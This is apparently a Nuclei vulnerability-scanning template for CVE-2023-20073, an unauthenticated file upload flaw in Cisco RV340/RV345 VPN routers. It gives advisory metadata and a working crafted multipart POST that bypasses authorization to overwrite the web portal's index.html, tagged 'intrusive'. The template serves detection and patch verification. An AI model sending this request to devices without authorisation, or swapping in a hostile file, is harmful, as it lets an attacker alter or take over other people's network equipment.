id: CVE-2023-20073 info: name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload author: princechaddha,ritikchaddha severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. remediation: | Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: - https://unsafe.sh/go-173464.html - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f - https://github.com/RegularITCat/CVE-2023-20073/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2023-20073 - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20073 cwe-id: CWE-434 epss-score: 0.52411 epss-percentile: 0.97201 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cisco product: rv340_firmware fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive variables: html_comment: "" # Random string as HTML comment to append in response body http: - raw: - | GET /index.html HTTP/1.1 Host: {{Hostname}} - | POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1 Host: {{Hostname}} Authorization: 1 Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="pathparam" Portal --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="fileparam" index.html --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="file.path" index.html --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="file"; filename="index.html" Content-Type: application/octet-stream {{index}} {{html_comment}} --------------------------f6f99e26f3a45adf-- - | GET /index.html HTTP/1.1 Host: {{Hostname}} extractors: - type: dsl name: index internal: true dsl: - body_1 matchers: - type: word part: body_3 words: - "{{html_comment}}" # digest: 490a00463044022043acd949856e5c4ae88b5f834bec5fb4ffde99ed5ed15a09a2be14f512f8f1d9022075b8bed7769f5c579e3e41eb05f32cac15fad017f50274361f383d63433365a7:922c64590222798bb761d5b6d8e72950